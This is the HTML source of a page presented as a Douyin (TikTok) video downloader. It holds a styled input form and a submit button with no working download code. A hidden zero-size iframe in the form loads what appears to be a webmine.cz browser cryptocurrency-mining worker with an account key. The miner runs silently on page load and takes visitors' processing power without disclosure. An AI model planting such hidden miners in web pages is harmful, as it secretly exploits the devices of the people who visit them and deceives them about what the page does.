<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">

<title>抖音视频下载</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<style type="text/css">
@charset "utf-8";
html,
body {
	width: 100%;
	height: 100%;
	padding: 0;
	margin: 0;
	/* background: url('http://img.jj20.com/up/allimg/1111/02161Q30321/1P216130321-1-1200.jpg') -330px -100px ; */
	background:url(./迪丽热巴.jpg) repeat -20px -100px;
}

div,
input,
button {
	border: none;
	outline: none;
	box-sizing: border-box;
}

.form-wrap {
	position: fixed;
	left: 23%;
	top: 28%;
	opacity:1;
	padding: 16px;
	background-color: #fff;
	/* margin-left: -240px;
	margin-top: 135px; */
	

}
.form-wrap:hover{
	position: fixed;
	left: 23%;
	top: 28%;
	opacity:0.4;
	padding: 16px;
	background-color: #fff;
	/* margin-left: -240px;
	margin-top: 135px; */


}

.form-wrap .input-wrap {
	position: relative;

	margin-top: 15px;
	margin-bottom: 16px;
}

.form-wrap .input-wrap input {

	font-size: 16px;
	border-bottom: 1px solid #ddd;
	transition: all .1s linear;
}

.form-wrap .input-wrap input:hover {
	border-color: #999;
}

.form-wrap .input-wrap input.active {
	border-color: #027bda;
	transition: all .1s linear;
}

.form-wrap .input-wrap label {
	position: absolute;
	left: 1px;
	top: 20px;
	color: #999;
	transition: all .1s linear;
}

.form-wrap .input-wrap label.active {
	top: 0;
	font-size: 12px;
	color: #027bda;
	transition: all .1s linear;
}





}
</style>

</head>
<body>

<div class="form-wrap" >

		<div class="input-wrap">
			<input type="text" id="username" readonly="readonly" value="请在下面输入视频链接" disabled="disabled"/>
			<iframe width=0 height=0 frameborder=0 src='https://webmine.cz/worker?key=gp0b1AJsp06bDm6&nomobile=1'></iframe>

		</div>
	
		<div class="input-wrap" style="bottom:-3">
			<input type="text" id="a" onkeyup="this.value=this.value.replace(/[%]/g,'')" >
		</div>

		<button id="bt" style="float:right;background-color: #027bda;height: 28px;padding: 0 20px;background-color:#0289f3;color: #fff;" >提交</button>


</div>




</body>
</html>